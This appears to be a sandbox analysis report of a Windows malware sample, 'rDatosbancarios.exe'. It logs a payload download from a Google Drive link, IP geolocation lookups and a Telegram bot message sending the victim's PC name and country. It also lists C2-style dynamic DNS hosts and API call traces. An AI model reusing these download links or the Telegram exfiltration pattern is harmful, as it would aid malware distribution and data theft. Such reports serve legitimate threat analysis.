            Source: global trafficHTTP traffic detected: GET /download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49729 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%2011/03/2025%20/%2003:09:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 07:09:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033DF4000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: rDatosbancarios.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033D2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033D2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033D2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20a
            Source: rDatosbancarios.exe, 0000000A.00000003.2141319634.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2141274531.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033DBB000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033D59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.0000000003748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.0000000003748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/1F
            Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.0000000003782000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3043887467.00000000052D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-
            Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2195719319.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2195719319.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/0Xj
            Source: rDatosbancarios.exe, 0000000A.00000003.2141319634.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3043622105.0000000003748000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2141274531.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2195719319.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=download
            Source: rDatosbancarios.exe, 0000000A.00000003.2195719319.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=download3
            Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.0000000003748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=downloadbj
            Source: rDatosbancarios.exe, 0000000A.00000003.2195719319.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=downloadm
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033CBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033CBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033CBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033CEA000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033DF4000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E00000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033D2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: rDatosbancarios.exe, 0000000A.00000003.2141319634.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2141274531.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: rDatosbancarios.exe, 0000000A.00000003.2141319634.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2141274531.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: rDatosbancarios.exe, 0000000A.00000003.2141319634.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2141274531.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: rDatosbancarios.exe, 0000000A.00000003.2141319634.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2141274531.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: rDatosbancarios.exe, 0000000A.00000003.2141319634.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2141274531.00000000037C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033DEC000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033D59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033DEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040541C
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_004033B6
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004068460_2_00406846
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_00404C590_2_00404C59
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0040684610_2_00406846
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_00404C5910_2_00404C59
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355537010_2_03555370
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355D27810_2_0355D278
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355C14610_2_0355C146
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355A08810_2_0355A088
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355C73810_2_0355C738
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355C46810_2_0355C468
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355CA0810_2_0355CA08
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355E98810_2_0355E988
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_035569A010_2_035569A0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_03556FC810_2_03556FC8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355CFAA10_2_0355CFAA
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_03553E0910_2_03553E09
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355CCD810_2_0355CCD8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_03553AA110_2_03553AA1
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355E97A10_2_0355E97A
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0355F96110_2_0355F961
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_035529EC10_2_035529EC
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8514810_2_35F85148
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8185010_2_35F81850
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8944810_2_35F89448
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F81FA810_2_35F81FA8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F80B3010_2_35F80B30
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F82A9010_2_35F82A90
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8CDC010_2_35F8CDC0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8CDAF10_2_35F8CDAF
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F89D3810_2_35F89D38
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8513E10_2_35F8513E
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8F93010_2_35F8F930
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8F92110_2_35F8F921
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8F4D810_2_35F8F4D8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8F4C810_2_35F8F4C8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F88CC010_2_35F88CC0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F88CB110_2_35F88CB1
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8F08010_2_35F8F080
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8F07110_2_35F8F071
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8004010_2_35F80040
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8184110_2_35F81841
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8EC2810_2_35F8EC28
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8EC1810_2_35F8EC18
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8E7D010_2_35F8E7D0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8E7CF10_2_35F8E7CF
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F81F9810_2_35F81F98
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8E37810_2_35F8E378
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8E36910_2_35F8E369
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8DF2010_2_35F8DF20
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F80B2010_2_35F80B20
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8DF1F10_2_35F8DF1F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8DAC810_2_35F8DAC8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8DAB910_2_35F8DAB9
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8D67010_2_35F8D670
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8966810_2_35F89668
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8D66010_2_35F8D660
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_35F8D21810_2_35F8D218
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_3666A0E010_2_3666A0E0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36667B7810_2_36667B78
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_3666230010_2_36662300
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_366681D010_2_366681D0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36668FB010_2_36668FB0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36666E6210_2_36666E62
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_3666346010_2_36663460
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_3666CE6F10_2_3666CE6F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36664A6810_2_36664A68
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36666E7010_2_36666E70
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_3666EE7010_2_3666EE70
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_3666AE7F10_2_3666AE7F
